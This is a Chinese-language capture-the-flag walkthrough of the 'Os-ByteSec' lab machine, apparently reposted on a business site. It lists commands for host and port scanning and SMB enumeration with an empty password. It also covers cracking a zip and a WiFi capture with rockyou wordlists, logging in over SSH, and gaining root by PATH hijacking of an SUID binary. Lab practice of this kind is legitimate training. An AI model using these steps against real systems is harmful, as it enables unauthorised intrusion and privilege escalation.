Os-ByteSec

主机发现

1. 1 netdiscover -i eth0 -r 192.168.170.0/24

复制代码

端口扫描

1. 1 nmap -sV 192.168.170.145

复制代码

访问80端口，提示使用smb攻击

目次扫描，未发现有代价的信息

1. 1 dirb http://192.168.170.145/

复制代码

SMB渗出
SMB是一个网络协议名，它能被用于Web连接和客户端与服务器之间的信息沟通，允许应用步伐和终端用户从远端的文件服务器访问文件资源
查询靶机中的用户

1. 1 enum4linux -U 192.168.170.145

复制代码

enum4linux是用于罗列系统上的SMB服务的工具，可以轻松的从与SMB服务有关的目标中快速提取信息

爆破smb用户的暗码，暗码为空

1. 1 acccheck -t 192.168.170.145 -u smb -v

复制代码

罗列靶机的共享资源

1. 1 smbmap -u 'smb' -p '' -H 192.168.170.145

复制代码

查看靶机的共享目次

1. 1 smbclient -L 192.168.170.145 -U smb

复制代码

通过SMB登录靶机

1. 1 smbclient //192.168.170.145/print$ -U smb

复制代码

发现文件满是0字节，但是还有一个.目次，尝试进入

1. 1 smbclient //192.168.170.145/smb -U smb

复制代码

下载main.txt查看内容，无有效信息

1. 1 get main.txt

复制代码

下载safe.zip进行解压

1. 1 get safe.zip

复制代码

发现需要暗码，破解得到暗码为hacker1

1. 1 fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip

复制代码

解压得到两个文件，secret.jpg和user.cap，打开图片未发现有效信息，然后打开流量包发现是个无线数据包，wifi名称为blackjax

使用aircrack-ng破解user.cap文件，得到暗码为snowflake

1. 1 aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap

复制代码

登录ssh，得到第一个flag

1. 1 ssh blackjax@192.168.170.145 -p 2525

复制代码

发现该用户不能执行sudo

查看系统中带SUID的步伐

1. 1 find / -user root -perm -4000 -print 2>/dev/null

复制代码

执行netscan命令

下载并分析该文件，发现它调用了execve函数执行了netstat -antp命令

1. 1 scp -P 2525 blackjax@192.168.170.145:/usr/bin/netscan /tmp
2. 2 strace -f /tmp/netscan

复制代码

通过劫持环境变量来让netscan在执行时执行其他命令

1. 1 #tmp有写权限
2. 2 echo "/bin/sh" > /tmp/netstat
3. 3 chmod 777 /tmp/netstat
4. 4 export PATH=/tmp:$PATH
5. 5 netscan

复制代码

乐成提权，得到第二个flag

 

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。